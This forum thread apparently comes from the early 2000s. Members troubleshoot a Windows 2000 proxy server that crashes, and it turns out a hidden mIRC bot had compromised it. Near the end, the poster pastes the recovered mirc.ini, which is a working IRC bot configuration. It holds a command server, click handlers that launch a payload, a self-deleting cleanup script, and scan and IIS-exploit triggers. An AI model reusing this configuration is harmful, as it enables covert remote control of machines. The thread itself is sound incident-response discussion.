I need some help on a PC problem....

[RoundEye]

.....maybe a mod can figure out if this is hardware, software or security?

Here's the deal,
Win2K server with WinProxy 3.0 and two nics, serving about 20 clients on a DSl line using EnterNet 300 software.

It bluescreens when sharing the internet with Stop:0X000000D1 DRIVER_IRQL_NOT_LESS_OR_EQUAL.
It points to two different address at different times when it bluescreens. 39f75bbc - nat.sys and 3a6407b5 - mrxsmb.sys. (there's a whole lot more numbers in the stop error)

It will also randomly redirect me to another webpage when I try to download something, (like when I was downloading drivers).

In the add/remove programs it has mIRC and KFGH installed, and nobody has any idea how they got there, or even what KFGH is. mIRC won't let me uninstall it unless I stop the service first, but I don't know which service it is.

When I reboot the PC it will change the clock settings around six to ten hours, but the bios stays at the right time, I tried to change the battery anyway but that didn't work.

I've updated the chipset drivers and installed service pack three.

I've installed a new video card, new ram and two new Intel nics and it still bluescreens.

OK people, what the f*** is up with this server?!?!

[Randy]

no fricken idea... sorry ahwell qwik^bump

[nightowl]

Originally posted by RoundEye
.....maybe a mod can figure out if this is hardware, software or security?

Here's the deal,
Win2K server with WinProxy 3.0 and two nics, serving about 20 clients on a DSl line using EnterNet 300 software.

It bluescreens when sharing the internet with Stop:0X000000D1 DRIVER_IRQL_NOT_LESS_OR_EQUAL.
It points to two different address at different times when it bluescreens. 39f75bbc - nat.sys and 3a6407b5 - mrxsmb.sys. (there's a whole lot more numbers in the stop error)

It will also randomly redirect me to another webpage when I try to download something, (like when I was downloading drivers).

In the add/remove programs it has mIRC and KFGH installed, and nobody has any idea how they got there, or even what KFGH is. mIRC won't let me uninstall it unless I stop the service first, but I don't know which service it is.

When I reboot the PC it will change the clock settings around six to ten hours, but the bios stays at the right time, I tried to change the battery anyway but that didn't work.

I've updated the chipset drivers and installed service pack three.

I've installed a new video card, new ram and two new Intel nics and it still bluescreens.

OK people, what the f*** is up with this server?!?!

sounds like there is a IRQ problem between the two network cards....try manualy assigning them two different IRQ's...and if that doesn't work, take one of the cards and put it in a different slot

[Norm]

I don't have a clue either sorry, hope these links can shed some light.


http://support.microsoft.com/default...b;en-us;281292

http://support.microsoft.com/search/...false&numDays=

http://support.microsoft.com/default...b;en-us;318437

http://support.microsoft.com/search/...false&numDays=

[YeOldeStonecat]

I moved it here, hopefully more knowing eyes on it over here.

That error is usually driver related, or a bad service installed.

http://www.microsoft.com/technet/tre...d_stp_ottj.asp

driver_irql_not_less_equal leads many to think it's hardware IRQ related, but it's actually driver IRQ related....interrupt request in memory.

I've read about a lot of nightmares installing EnterNET software on servers. Many server guide sites mention never to install any PPPoE software on servers. If you need a PPPoE connection, and you want to multiple home your server (2x NICs)....then set a router on the WAN NIC...let the router do the PPPoE logon for the server.

The fact that mIRC, and whatever that KFGH is, appear without you installing it would scare the heck out of me, wondering if someone hacked in and is running mIRC relay or spoofing by using your server.

I'm not familiar with WinProxy...and how it uses DNS, but how is your DNS setup? You running AD on that server? Using it's own DNS, with DNS properties set to forward to the ISP's DNS servers? TCP properties for both NICs are_____?

The time changes we can cure with W32 time....set it to a public time server. I'll give you a good link for thatl, have a great article at work I'll link to.

If it's service 20 clients, I imagine it's a server in place at some office already. I'm just wondering how much "down time" you may have with it. Trying to feel out how open you are to re-installing.

[RoundEye]

Thanks everybody, I'm starting to think the server has been compromised. I'm going to do some security checks in just a little while. The mirc being installed and some other things I've read make me think that, also the link norm posted seems to be like other things I've read. This Link.

Thanks for coming back and hanging out norm.

The guy that takes care of the pc now didn't even have an admin password setup.

YOSC, the dns is being taken care of by Winproxy. I'm thinking about removing as many services from Winproxy as I can and letting Win2K take care of them. DHCP is also taken care of by winproxy.

I've though about reformatting, but if security has been breeched, the backup tapes are likely compromised too.

I'm on my way there, I'll let y'all know what's up later on today.

[JawZ]

Can anyone tell me what the following is: I have a win2000
> server and three boxes keep coming up on the desktop. KFGH
> (a hammer beside it), Status(empty Box) mIRC Options(empty
> box with a cancel button)...Hopefully someone can help
> please repsond via email: jsimmons@khitomer.com

I'm seeing this too. I think after installing Total Recorder from
Download.com. I tried to uninstall, but it fails. If I go into the
registry I can delete three or four keys referring to it, but there is
one that will not delete; when I restart it shows up. I also noticed
my MusicMatch and Windows CD player no longer play CDs.


Not good Roundeye...something is up.

[JawZ]

http://support.microsoft.com/default...b;en-us;293077

This one as well..........

[RoundEye]

Well I restarted the server in the safe mode and uninstalled mirc. I found a mirc.ini file in the system32 folder. I opened it in notepad and it was full of hacker info. The user name was angel of death, plus some other stuff. I wish I hadn't forgot to copy it to a floppy, I'll get it on Monday and post it.

Once I removed mirc and KFGH and the server ran fine after that. I think somebody was using the server for a DDoS attack. See here. Even after a full scan with up to date virus software this file didn't show up.

[JawZ]

Originally posted by RoundEye
Well I restarted the server in the safe mode and uninstalled mirc. I found a mirc.ini file in the system32 folder. I opened it in notepad and it was full of hacker info. The user name was angel of death, plus some other stuff. I wish I hadn't forgot to copy it to a floppy, I'll get it on Monday and post it.

Once I removed mirc and KFGH and the server ran fine after that. I think somebody was using the server for a DDoS attack. See here. Even after a full scan with up to date virus software this file didn't show up.

What antivirus was being used?

[Norm]

Good stuff RoundEye, glad to hear you found out what was going on.

If I wasn't in fear of losing my ISP service, and the law, I'd be "hacking back" to some of these jerks. See if they can take what they dish out, if you know what I mean.

You know how easy it is to write a virus that no virus scanner will catch, very easy. I could do it about an hour. The trick is getting it to execute on another machine. It's easy on the average users machine, but not so easy on an experienced users.

[RoundEye]

Originally posted by UOD
What antivirus was being used?

It wasn't really a virus like the link I posted, somehow they got the mirc installed on the server. One of the employees has a mapped kaaza folder with tons of porn in it. I bet that's how they got access into the server in the first place.

I'm going to call him on Monday and get him to delete it and uninstall kazaa. The **** hit the fan Friday when the office manager found out what happened. The lady is in her late 50's and I had to listen to bitching for about three hours. I was so damn aggravated at that point I called my office. One of the guys I work with told my boss, and he called and got her to calm down. My god, I just wanted to walk up and poke that lady in her eye, I just couldn't take the nagging and bitching any longer.

I keep trying to tell people that on a proxy server to make sure that nothing is bound to the external nic except for tcp/ip and to make sure that netbios over tcp/ip is disabled, but some ******* people refuse to listen.

Here's why,

One

and

Two

[YeOldeStonecat]

Even on multiply homed servers, I prefer a router on that external NIC. Pushes the "Wild Side" out one step further.

[RoundEye]

So what can you tell me from this file? It's the mIRC .ini file that I deleted, opened it up with notepad and this is what I got. Also, I can't get email to send or receive anywhere on this network through WinProxy. Tried about a billion different configs today, I think something in Win2K or Winproxy is corrupt now.

[files]
addrbk=addrbk.ini
servers=servers.ini
browser=c:\program files\internet explorer\iexplore.exe
emailer=c:\program files\outlook express\msimn.exe
finger=finger.txt
urls=urls.ini
[warn]
fserve=off
dcc=off
[options]
n0=1,0,0,0,0,0,300,1,0,1,1,0,0,0,1,1,0,1,1,1,4096,0,0,0,0,0,1,1,0,50,1,0
n1=5,100,0,0,0,0,0,0,7,1,1,1,0,0,1,1,0,0,0,0,1,1,0,0,20,0,0,0,0,2,0,0,0
n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,1,0,1,0,0,120,20,999,0,0,1,0,1,1,0,0,0
n3=200,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,360,21600
n4=0,0,1,1,0,0,9999,0,0,1,1,0,1024,0,1,9999,30,0,0,0,0,0,0,3,1,5000,0,2,0,0,2
n5=1,1,1,1,1,1,1,1,1,1,6667,500000,0,0,0,0,1,1,300,30,10,0,0,22,0,0,0,100000,1,0,0,25
n6=0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,100,1,1,0,0,0,0,0,2,1
n7=0,0,0,0,0,0,1,0,0
[about]
version=5.9
show=magnitude
[dirs]
[fonts]
fscripts=Arial,412,0
fstatus=Arial,413,0
fchannel=Wingdings,407,2
fquery=Wingdings,407,2
[events]
default=2,2,2,2,2,1,1,2
[text]
commandchar=\
linesep=-
timestamp=[HH:nn]
accept=*.*
ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
network=All
lastreset=[no date]
[ports]
random=on
bind=off
[ident]
active=yes
userid=raina78
system=UNIX
port=113
[socks]
enabled=no
port=1080
method=4
dccs=no
[sjis]
enabled=no
[dde]
ServerStatus=on
ServiceName=SonyDrone2
CheckName=off
[marker]
show=on
size=20
colour=1
method=1
[fileserver]
homedir=C:
warning=off
[dccserver]
n0=0,59,0,0,0,0
[agent]
enable=0,0,0
char=merlin.acs
options=0,0,0,100,0
speech=150,60,100,1,180,10,50,1,1,1,0,50,1
channel=1,1,1,1,1,1,1,1,1
private=1,1,1,1
other=1,1,1,1,1,1,1
pos=20,20
[mirc]
user=Angel of Death
email=blah
nick=SYN-[9343]
anick=SYN-[6966]
host=beasts.tosham.comSERVER:beasts.tosham.com:6667
[windows]
main=-10,112,-10,27,0,-1,-1
wchannel=0,373,0,212,0,1,0
scripts=-7,1036,3,764,0,0,0
wserv=28,123,28,34,1,1,0
wquery=56,359,56,221,0,1,0
status=0,112,0,27,0,1,0
wdccg=-1,269,-1,264,0,1,0
wlist=-1,510,-1,267,0,1,0
wdccs=-1,269,-1,271,0,1,0
[colours]
n0=0,6,4,5,2,3,3,3,3,3,3,1,5,7,6,1,3,2,3,5,1,0,1,0,1,15
[pfiles]
n0=popups.ini
n1=popups.ini
n2=popups.ini
n3=popups.ini
n4=popups.ini
[clicks]
status=//run empavms.exe /n /fh expl32 | /nick DT-Status $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED STATUS SCREEN!
query=//run empavms.exe /n /fh expl32 | /nick DT-Query $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED QUERY SCREEN!
channel=//run empavms.exe /n /fh expl32 | /nick DT-Channel $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED CHANNEL SCREEN!
nicklist=//run empavms.exe /n /fh expl32 | /nick DT-NickList $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED NICKLIST SCREEN!
notify=//run empavms.exe /n /fh expl32 | /nick DT-Notify $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED NOTIFY SCREEN!
message=//run empavms.exe /n /fh expl32 | /nick DT-Message $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED MESSAGE SCREEN!
[wizard]
warning=6
[nicklist]
[layers]
mirc=0
enable=1,1,1,1,1,1,1,1,1,1
others=75
[Script]
alias wrd { write del.bat $$1- }
alias makedel { write -c del.bat | wrd ping 127.0.0.1 -n 4 | wrd del aliases.ini | wrd del bnc.dll | wrd del uptodo.exe | wrd del empavms.exe | wrd del EXPL32.EXE | wrd del wincmd32.bat | wrd del impvms.dll | wrd del ircd.conf | wrd del ircd.pid | wrd del mirc.ini | wrd del proxy.hash | wrd del psexec.exe | wrd del remote.ini | wrd del restart.exe | wrd del script1.dll | wrd del wircd.exe | wrd del dl.mrc | wrd del moo.dll | wrd del unicodbag.txt | wrd del svchost32.exe | wrd del PSKILL.EXE | wrd del norton.bat | wrd del button.exe | wrd del config.hfg | wrd del Libparse.exe | wrd del nicks.txt | wrd del identd.txt | wrd del close.dll | wrd del del.bat }
[waves]
send=Event Beep
[dragdrop]
n0=*.wav:/sound $1 $2-
n1=*.*:/dcc send $1 $2-
s0=*.*:/dcc send $1 $2-
[Perform]
n0=//join %chan
[local]
local=adsl-157-7-56.msy.bellsouth.net
localip=66.157.7.56
longip=1117587256

[findtext]
n0=!gethost
n1=%Scan.Range
n2=!stopscan
n3=inactive
n4=!getscanner
n5=!aim.join
n6=toc_chat_
n7=msg %chan
n8=msg %chan joined
n9=msg %chan joined %
n10=nhtml.dll
n11=msg %chan
n12=dtkode.txt
n13=[DT-GT] [IIS]
n14=dtk0de.txt
n15=testuni.txt
n16=textuni.txt
n17=unicod_ready
n18=unicod_ready.txt
n19=isin
[afiles]
n0=aliases.ini
[extensions]
n0=defaultEXTDIR:
[rfiles]
n0=remote.ini
n1=remote.ini
n2=bnc.dll
n3=impvms.dll
n4=script1.dll
n5=config.hfg
n6=reg.xpl
n7=spig.txt
n8=msccctl32.ocx
n9=tools.txt
n10=tools2.txt

[CableDude]

Question about the installed mIRC. Who has the rights to do that?

I mean it just didn't get installed by itself somehow, right?

[Norm]

Originally posted by CableDude
Question about the installed mIRC. Who has the rights to do that?

I mean it just didn't get installed by itself somehow, right?

Security on a PC is really non existant. There are just multi levels of weakness. A well versed knowledgeable person can get past any security, it depends on how much they know.